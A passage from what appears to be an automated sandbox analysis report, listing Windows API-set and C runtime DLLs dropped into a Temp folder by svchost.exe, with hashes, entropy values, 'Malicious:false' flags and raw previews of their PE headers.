                                  SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...|...................=...................................api-ms-win-core-memory-l1-1-0.dl

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-namedpipe-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18232
                                  Entropy (8bit):7.16337963516533
                                  Encrypted:false
                                  SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
                                  MD5:6F6796D1278670CCE6E2D85199623E27
                                  SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
                                  SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
                                  SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processenvironment-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):19248
                                  Entropy (8bit):7.073730829887072
                                  Encrypted:false
                                  SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                                  MD5:5F73A814936C8E7E4A2DFD68876143C8
                                  SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                                  SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                                  SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processthreads-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):19392
                                  Entropy (8bit):7.082421046253008
                                  Encrypted:false
                                  SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                                  MD5:A2D7D7711F9C0E3E065B2929FF342666
                                  SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                                  SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                                  SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processthreads-l1-1-1.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18744
                                  Entropy (8bit):7.1156948849491055
                                  Encrypted:false
                                  SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                                  MD5:D0289835D97D103BAD0DD7B9637538A1
                                  SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                                  SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                                  SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-profile-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):17712
                                  Entropy (8bit):7.187691342157284
                                  Encrypted:false
                                  SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                                  MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                                  SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                                  SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                                  SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-rtlsupport-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):17720
                                  Entropy (8bit):7.19694878324007
                                  Encrypted:false
                                  SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                                  MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                                  SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                                  SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                                  SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-string-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18232
                                  Entropy (8bit):7.137724132900032
                                  Encrypted:false
                                  SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                                  MD5:12CC7D8017023EF04EBDD28EF9558305
                                  SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                                  SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                                  SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-synch-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):20280
                                  Entropy (8bit):7.04640581473745
                                  Encrypted:false
                                  SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                                  MD5:71AF7ED2A72267AAAD8564524903CFF6
                                  SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                                  SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                                  SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-synch-l1-2-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18744
                                  Entropy (8bit):7.138910839042951
                                  Encrypted:false
                                  SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                                  MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                                  SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                                  SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                                  SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...X*uY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....X*uY........9...T...T.......X*uY........d...............X*uY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...|...............H...................A.....................................api-ms-win-core-synch-

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-sysinfo-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):19248
                                  Entropy (8bit):7.072555805949365
                                  Encrypted:false
                                  SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                                  MD5:19A40AF040BD7ADD901AA967600259D9
                                  SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                                  SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                                  SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-timezone-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18224
                                  Entropy (8bit):7.17450177544266
                                  Encrypted:false
                                  SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                                  MD5:BABF80608FD68A09656871EC8597296C
                                  SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                                  SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                                  SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-util-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18232
                                  Entropy (8bit):7.1007227686954275
                                  Encrypted:false
                                  SSDEEP:192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
                                  MD5:0F079489ABD2B16751CEB7447512A70D
                                  SHA1:679DD712ED1C46FBD9BC8615598DA585D94D5D87
                                  SHA-256:F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
                                  SHA-512:92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-conio-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):19256
                                  Entropy (8bit):7.088693688879585
                                  Encrypted:false
                                  SSDEEP:384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
                                  MD5:6EA692F862BDEB446E649E4B2893E36F
                                  SHA1:84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
                                  SHA-256:9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
                                  SHA-512:9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-convert-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):22328
                                  Entropy (8bit):6.929204936143068
                                  Encrypted:false
                                  SSDEEP:384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
                                  MD5:72E28C902CD947F9A3425B19AC5A64BD
                                  SHA1:9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
                                  SHA-256:3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
                                  SHA-512:58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-environment-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18736
                                  Entropy (8bit):7.078409479204304
                                  Encrypted:false
                                  SSDEEP:192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
                                  MD5:AC290DAD7CB4CA2D93516580452EDA1C
                                  SHA1:FA949453557D0049D723F9615E4F390010520EDA
                                  SHA-256:C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
                                  SHA-512:B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-filesystem-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):20280
                                  Entropy (8bit):7.085387497246545
                                  Encrypted:false
                                  SSDEEP:384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
                                  MD5:AEC2268601470050E62CB8066DD41A59
                                  SHA1:363ED259905442C4E3B89901BFD8A43B96BF25E4
                                  SHA-256:7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
                                  SHA-512:0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-heap-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):19256
                                  Entropy (8bit):7.060393359865728
                                  Encrypted:false
                                  SSDEEP:192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
                                  MD5:93D3DA06BF894F4FA21007BEE06B5E7D
                                  SHA1:1E47230A7EBCFAF643087A1929A385E0D554AD15
                                  SHA-256:F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
                                  SHA-512:72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-locale-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18744
                                  Entropy (8bit):7.13172731865352
                                  Encrypted:false
                                  SSDEEP:192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
                                  MD5:A2F2258C32E3BA9ABF9E9E38EF7DA8C9
                                  SHA1:116846CA871114B7C54148AB2D968F364DA6142F
                                  SHA-256:565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
                                  SHA-512:E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
